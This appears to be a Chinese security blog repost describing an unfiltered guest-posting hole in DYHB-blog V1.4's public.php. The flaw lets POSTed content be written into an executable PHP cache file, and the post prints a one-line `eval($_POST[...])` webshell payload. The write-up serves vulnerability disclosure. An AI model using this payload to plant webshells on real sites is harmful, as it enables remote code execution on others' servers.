DYHB-blog V1.4 PHP CMS 博客系统直接写马漏洞。
刚下载来看一开始就看到,运气真好。
public.php 文件,游客发布文章……
经典对白看代码。
public.php: if($view=="save"){ |
get_argpost 是获取 POST。
没有任何的过滤,然后悲剧在,生成缓存文件,生成过程就不看了。
widthcachec_cms_newlog.php
缓存文件开头没有 exit();?>,看第一段内容:
a:2:{i:0;a:1:{i:0;a:57:{i:0;s:1:"3";s:7:"blog_id";s:1:"3";i:1;s:24:" eval($_POST[xxxx]);?>"
直接执行这个 POST 过来的内容……
直接XX了……
文章来源于lcx.cc:DYHB-blog V1.4 CMS - 博客系统写马漏洞
当self-xss遇到clickjacking D&G | 2014-01-13 10:35 self-xss一般是认为没有危害的。比如http://kuai.xunlei.com/ 这里的搜索栏就存在一个典型的self-xss,输入内容的时候会出现一个提示,…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论